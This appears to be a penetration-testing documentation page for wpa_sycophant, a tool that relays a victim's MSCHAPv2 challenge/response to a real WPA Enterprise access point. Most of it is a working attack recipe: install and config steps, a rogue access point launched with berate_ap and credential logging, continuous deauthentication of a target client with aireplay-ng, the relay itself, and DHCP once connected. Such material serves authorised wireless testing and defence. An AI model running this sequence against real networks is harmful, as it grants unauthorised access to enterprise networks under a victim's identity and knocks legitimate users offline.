> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# wpa_sycophant

> MSCHAPv2 relay tool: reuses a victim's authentication challenge/response to authenticate to the real WPA Enterprise AP without knowing their password.

## Overview

wpa\_sycophant exploits a fundamental weakness in MSCHAPv2: the challenge and response can be relayed. When a victim connects to a rogue AP (run by berate\_ap), wpa\_sycophant forwards the AP's challenge to the victim and relays their response to the real AP, authenticating as the victim without cracking the password.

Works when the victim does not validate the server certificate.

***

## Install

```bash theme={"dark"}
git clone https://github.com/sensepost/wpa_sycophant.git
cd wpa_sycophant
```

***

## Usage

```bash theme={"dark"}
./wpa_sycophant.sh -c <config.conf> -i <interface>
```

***

## Config File

```
network={
  ssid="<TARGET-SSID>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity=""
  anonymous_identity=""
  password=""
  eap=PEAP
  phase1="crypto_binding=0 peapver=0"
  phase2="auth=MSCHAPV2"
  bssid_blacklist=<ROGUE-AP-MAC>
}
```

`bssid_blacklist` must be set to the rogue AP's MAC to prevent wpa\_sycophant from connecting back to itself.

If the relay fails, try:

```
phase1="peapver=1"
```

***

## Full Attack Setup

Shell 1, set rogue AP MAC and launch berate\_ap:

```bash theme={"dark"}
systemctl stop network-manager
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up

cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout output.log wlan1 lo <TARGET-SSID>
```

Shell 2, deauthenticate the target client:

```bash theme={"dark"}
airmon-ng start wlan0
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>
```

Shell 3, start the relay:

```bash theme={"dark"}
cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan2
```

Shell 4, get an IP once connected:

```bash theme={"dark"}
dhclient wlan2 -v
```
